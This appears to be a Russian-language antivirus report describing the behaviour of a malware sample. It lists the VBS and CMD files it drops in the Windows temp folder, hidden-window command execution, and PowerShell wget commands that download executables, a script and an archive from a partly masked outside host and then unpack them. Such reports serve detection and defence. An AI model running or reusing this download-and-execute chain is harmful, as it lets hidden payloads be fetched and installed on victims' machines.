Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\rewop.vbs"
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\rewop.vbs
- %WINDIR%\temp\rewop.cmd
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c start /b %WINDIR%\Temp\rewop.cmd' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c start /b %WINDIR%\Temp\rewop.cmd
- '<SYSTEM32>\cmd.exe' /K %WINDIR%\Temp\rewop.cmd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFhgIAPI1Nh_RunNHide.oui" -outfile "%WINDIR%\Temp\RunNHide.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFhgGnVnrCh_dControl.oui" -outfile "%WINDIR%\Temp\dcontrol.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFugMKLWnWS_protect.cmd" -outfile "%WINDIR%\Temp\protect.cmd"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wget "https://www.cj##nt.com/doc/21_06/KFwqndNNvHS_update2.zip" -outfile "%WINDIR%\Temp\update2.zip"
- '<SYSTEM32>\timeout.exe' 5
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Expand-Archive %WINDIR%\Temp\update2.zip -DestinationPath %WINDIR%\Temp"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Expand-Archive %WINDIR%\Temp\Microsoft.zip -DestinationPath %WINDIR%\Temp"
